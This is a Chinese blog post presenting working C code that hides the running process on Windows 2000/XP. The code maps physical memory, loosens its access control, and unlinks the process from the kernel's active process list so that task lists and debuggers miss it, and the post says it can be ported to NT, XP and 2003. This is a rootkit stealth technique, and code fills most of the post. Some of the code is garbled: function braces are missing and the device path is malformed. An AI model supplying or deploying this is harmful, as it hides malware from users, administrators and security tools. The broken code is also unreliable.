Win2000/XP下隐藏进程

最新推荐文章于 2018-12-26 16:10:00 发布
最新推荐文章于 2018-12-26 16:10:00 发布
阅读量2.6k 收藏
点赞数
分类专栏: VC/VC.NET/C# 文章标签: attributes null access object string descriptor
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/littlerain007/article/details/146807
版权

  在讲解之前,首先提一提一些结构,进程执行体块中有数个进程相关链,其中之一是活动进程链。此链的重要作用之一就是在查询系统信息时供遍历当前活动进程,很有意思的是M$可能因效率因素使它被排除出进程核心块,意味进线程切换等操作时并不利用它,进一步说改写它也不该有不可忽视的问题(此即本方案的基础)。
  怎么做很明显了,在活动进程双向链中删除想要得隐藏的进程既可,核心调试器(如softice/proc)亦查不出来。
  2000下的隐藏当前进程的代码如下:
#include<windows.h>
 #include<Accctrl.h>
#include<Aclapi.h>
#define NT_SUCCESS(Status)      ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH    ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
typedef LONG NTSTATUS;
typedef struct _IO_STATUS_BLOCK
{
  NTSTATUS  Status;
  ULONG    Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING
{
  USHORT    Length;
  USHORT    MaximumLength;
PWSTR    Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

#define OBJ_INHERIT       0x00000002L
#define OBJ_PERMANENT      0x00000010L
#define OBJ_EXCLUSIVE      0x00000020L
#define OBJ_CASE_INSENSITIVE  0x00000040L
#define OBJ_OPENIF       0x00000080L
#define OBJ_OPENLINK      0x00000100L
#define OBJ_KERNEL_HANDLE    0x00000200L
#define OBJ_VALID_ATTRIBUTES  0x000003F2L

typedef struct _OBJECT_ATTRIBUTES
{
  ULONG    Length; 
  HANDLE    RootDirectory; 
  PUNICODE_STRING ObjectName; 
  ULONG    Attributes; 
  PVOID    SecurityDescriptor; 
  PVOID    SecurityQualityOfService; 
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;  
 
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)( 
            OUT PHANDLE SectionHandle, 
            IN ACCESS_MASK DesiredAccess, 
            IN POBJECT_ATTRIBUTES ObjectAttributes 
            ); 
 
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(         
             IN OUT PUNICODE_STRING DestinationString, 
             IN PCWSTR SourceString 
             ); 
 
RTLINITUNICODESTRING    RtlInitUnicodeString; 
ZWOPENSECTION      ZwOpenSection; 
HMODULE  g_hNtDLL = NULL; 
PVOID   g_pMapPhysicalMemory = NULL; 
HANDLE   g_hMPM   = NULL; 
 
BOOL InitNTDLL() 

  g_hNtDLL = LoadLibrary( "ntdll.dll" ); 
  if ( !g_hNtDLL ) 
  { 
    return FALSE; 
  } 
 
  RtlInitUnicodeString = 
    (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString"); 
   
  ZwOpenSection = 
    (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection"); 
   
  return TRUE; 

 
VOID CloseNTDLL() 

  if(g_hNtDLL != NULL) 
  { 
    FreeLibrary(g_hNtDLL); 
  } 

 
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) 

   
  PACL pDacl=NULL; 
  PACL pNewDacl=NULL; 
  PSECURITY_DESCRIPTOR pSD=NULL; 
  DWORD dwRes; 
  EXPLICIT_ACCESS ea; 
   
  if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, 
    NULL,NULL,&pDacl,NULL,&pSD)!=ERROR_SUCCESS) 
  { 
    goto CleanUp; 
  } 
   
  ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); 
  ea.grfAccessPermissions = SECTION_MAP_WRITE; 
  ea.grfAccessMode = GRANT_ACCESS; 
  ea.grfInheritance= NO_INHERITANCE; 
  ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; 
  ea.Trustee.TrusteeType = TRUSTEE_IS_USER; 
  ea.Trustee.ptstrName = "CURRENT_USER"; 
   
   
  if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS) 
  { 
    goto CleanUp; 
  } 
   
  if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS) 
  { 
    goto CleanUp; 
  } 
   
CleanUp: 
   
  if(pSD) 
    LocalFree(pSD); 
  if(pNewDacl) 
    LocalFree(pNewDacl); 

 
HANDLE OpenPhysicalMemory() 

  NTSTATUS    status; 
  UNICODE_STRING    physmemString; 
  OBJECT_ATTRIBUTES  attributes; 
   
  RtlInitUnicodeString( &physmemString, L"//Device//PhysicalMemory" ); 
   
  attributes.Length      = sizeof(OBJECT_ATTRIBUTES); 
  attributes.RootDirectory    = NULL; 
  attributes.ObjectName      = &physmemString; 
  attributes.Attributes      = 0; 
  attributes.SecurityDescriptor    = NULL; 
  attributes.SecurityQualityOfService  = NULL; 
   
  status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes); 
   
  if(status == STATUS_ACCESS_DENIED){ 
    status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes); 
    SetPhyscialMemorySectionCanBeWrited(g_hMPM); 
    CloseHandle(g_hMPM); 
    status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes); 
  } 
 
  if( !NT_SUCCESS( status )) 
  { 
    return NULL; 
  } 
   
  g_pMapPhysicalMemory = MapViewOfFile( 
    g_hMPM, 
    4, 
    0, 
    0x30000, 
    0x1000); 
  if( g_pMapPhysicalMemory == NULL ) 
  { 
    return NULL; 
  } 
   
  return g_hMPM; 

 
PVOID LinearToPhys(PULONG BaseAddress,PVOID addr) 

  ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr; 
  PGDE=BaseAddress[VAddr>>22]; 
  if ((PGDE&1)!=0) 
  { 
    ULONG tmp=PGDE&0x00000080; 
    if (tmp!=0) 
    { 
      PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF); 
    } 
    else 
    { 
      PGDE=(ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000); 
      PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12]; 
      if ((PTE&1)!=0) 
      { 
        PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF); 
        UnmapViewOfFile((PVOID)PGDE); 
      } 
      else return 0; 
    } 
  } 
  else return 0; 
 
  return (PVOID)PAddr; 

 
ULONG GetData(PVOID addr) 

  ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr); 
  PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys & 0xfffff000, 0x1000); 
  if (tmp==0) 
    return 0; 
  ULONG ret=tmp[(phys & 0xFFF)>>2]; 
  UnmapViewOfFile(tmp); 
  return ret; 

 
BOOL SetData(PVOID addr,ULONG data) 

  ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr); 
  PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); 
  if (tmp==0) 
    return FALSE; 
  tmp[(phys & 0xFFF)>>2]=data; 
  UnmapViewOfFile(tmp); 
  return TRUE; 

 
BOOL HideProcessAtAll() 

  if (InitNTDLL()) 
  { 
    if (OpenPhysicalMemory()==0) 
    { 
      return FALSE; 
    } 
    ULONG thread=GetData((PVOID)0xFFDFF124); 
    ULONG process=GetData(PVOID(thread+0x22c)); 
    ULONG fw=GetData(PVOID(process+0xa0)),bw=GetData(PVOID(process+0xa4)); 
    SetData(PVOID(fw+4),bw); 
    SetData(PVOID(bw),fw); 
    UnmapViewOfFile(g_pMapPhysicalMemory); 
    CloseHandle(g_hMPM); 
    CloseNTDLL(); 
  } 
  return TRUE; 
}
  调用HideProcessAtAll即隐藏当前进程,如若一运行就隐藏,会修改到进程活动链表头,运行一段时间后可能出现些小问题,怎么解决^_^
CN-注意默认物理地址0x30000为一页目录,在大多数情况时这样,但是是有例外的!怎么解决亦留作“...”吧,不多废话了。
     稍微改一下偏移可移植于NT/XP/2003。

littlerain007
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
系统进程隐藏工具(winxp
04-15
隐藏你想隐藏的任何进程,支持winxpwin7、vista系统。详细说明请看附件。
win2000XP的CMD命令集
10-25
2. `attrib.exe`:查看和修改文件或文件夹的属性,如隐藏、只读、存档等。 3. `chkdsk.exe`:磁盘检查工具,用于检查并修复磁盘错误。 4. `cleanmgr.exe`:磁盘清理工具,清理无用的临时文件和系统垃圾。 5. `cmd....
遍历创建进程、创建线程、加载模块的回调函数
weixin_34360651的博客
10-28 197
今天我们首先来看一下最简单的,关于遍历PspCreateProcessNotifyRoutine数组,PspLoadImageNotifyRoutine也同理 这两个数组保存了两组函数地址,它们将在有进程被创建或销毁,有镜像被装载或映射入内存的时候被依次调用, 当然了这两个符号都是未导出的,而且它们的数量在xpwin7下也有所不同,xp<2k3>下最大数...
关于XP进程问题(转载)
sk8boy的专栏
10-17 1143
Smss.exe 会话管理子系统,它负责启动用户会话。这个进程是通过系统进程来初始化的,包括对已经正在运行的Winlogon,Win32(Csrss.exe)线程和设定的系统变量作出反映。在它启动这些进程后,它等待Winlogon或者Csrss结束。如果这些过程是正常的,系统就关掉了。如果发生了什么不可预料的事情,smss.exe就会让系统停止响应(就是挂起)。 Csrss.exe 子系统服务器进
Pspcidtable遍历进程
LoveQuietly
09-14 548
PspCidTable句柄表                          PspCidTable也是一个句柄表,但是这个句柄表不是私有句柄表,它里面存放的是系统中所有的进程和线程对象,其索引也就是进程ID(PID)或线程ID(TID). 看到我们的表 kd> dd Pspcidtable 8055b260  e1001798 00000002 00000000 00000
窗口隐藏工具
07-17
运行环境:Win2000/XP 官方网站:http://www.warpfield.cn/wh 电子邮箱:kmlxk@yahoo.com.cn 软件详细信息 窗口隐藏工具是一款经过长时间发展、具有强大功能的系统辅助类软件,借助它您可以在日常使用电脑时更加...
WindowHide窗口隐藏工具 3.40
03-26
运行环境:Win2000/XP 官方网站:http://www.warpfield.cn/wh 电子邮箱:kmlxk@yahoo.com.cn 主要功能: 1.窗口管理。作为软件的主要功能,软件提供强大的窗口管理功能,可以对窗口进行隐藏、关闭、修改文字、图标等...
魔法隐藏2006绿色版.rar
04-14
您不但可以隐藏Win2000/XP/2003以上系统中的托盘图标,更可以隐藏Win98/95下的托盘图标(WinME下的托盘图标隐藏暂不支持)。同样支持热键隐藏;可以给托盘图标发送各种鼠标消息,比如弹出右键托盘菜单等。  3. ...
遍历线程调度表辅助检测进程
Sunny_wwc的专栏
01-11 2311
<br />以前就有了,只是还是自己实现了一下,当做复习吧,大侠飘过。进程隐藏一直是木马程序设计者不断探求的重要技术,目前Rootkit使用的主要的进程隐藏技术有:通过hook内核API来来隐藏,通过从进程表上摘除自身来隐藏。这样对于进程普通的API列举将不会得到真实的数据,为了获取可信进程信息,就要要采用其他的方法。<br />众所周知,windows执行的基本单位是线程,而不是进程,所以才有从进程表上摘除自身的进程隐藏方法,这是虽然从进程表上摘除了自身,但不会影响操作系统的调度,所以不影响程序运
WindowsXP查看进程的详细信息(转载)
liuyingan的专栏
03-13 301
一、查看进程 1. 开始 --> 运行wmic,出现dos窗口后输入 process 就可以看到进程路径了。 2. 运行CMD --> 输入wmic --> process。 二、终止进程 假如想Kill进程,那么就采用ntsd -c q -p PID命令 ,此命令号称是无敌的,只有System、SMSS.EXE和CSRSS.EXE不能杀。前两个是纯内核态的,最后...
遍历进程线程
qq_25420503的专栏
03-02 1334
typedef struct _CL_PROCESS_THREADINFO { LPVOID pvStartAddr; // 线程的起始地址 DWORD dwTid; // 线程Id WCHAR wszModuleName[MAX_PATH]; // 所属的模块路径 }CL_PROCESS_THREADINFO;  BOOL CLThread::QueryThreadInf
四种方法实现VC枚举系统当前进程
weixin_33912445的博客
08-30 280
    在Windows 2000以上的MS操作系统,通过Windows的任务管理器可以列出当前系统的所有活动进程(如图1所示),在Windows XP中,更是在控制台下增加了一条Tasklist命令,让系统下的所有进程无所遁行(如图2所示)。这一切是怎么实现的呢?  图 1  图 2 引用侯捷大师在《深入浅出MFC》的一句话,“知其然而不知其所以然,真不是个好办法”。既然如此,我们干脆自己...
Windows2000/XP下向进程插入自己的线程的演示
yxyhack's blog
09-29 1163
Windows2000/XP下向进程插入自己的线程的演示 编写 ImageWalk.Dll (作用是当被加载,它就通过VirtualQuery获取加载它的进程所加载的Dll信息)使用VC6生成一个 Win32 Dynamic-Link Library 工程编写DllMain函数内容如下: BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reas
XP系统基本进程
huang_abao的专栏
04-20 465
WindowsXP系统基本进程,关闭那些不必要的进程,合理分配利用你的电脑的资源
【旧文章搬运】遍历EPROCESS中的ActiveProcessLinks枚举进程
weixin_30569153的博客
12-26 138
原文发表于百度空间,2008-7-25========================================================================== 前面对PEB的相关结构和其中的重要成员进行了分析和学习,现在开始真正进入内核,学习内核中的一些结构.这个EPROCESS结构在ntddk.h中有定义,但是并未给出具体的结构,因此要得到EPROCESS中一些重要...
windows xp 获取进程
黑土的Blog
08-19 1739
c:/>wmicwmic:root/cli>process 以上命令将列出系统所有进程信息,包括进程号ProcessId
Win2000下BUGZILLA安装配置详述与经验分享
本文档分享了作者在Windows 2000环境下安装配置Bugzilla的心得体会,旨在帮助其他遇到同样问题的用户。作者首先强调了在网上找到的关于Bugzilla在Windows下安装的资料可能存在适用性问题,他费时一周解决了安装过程...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值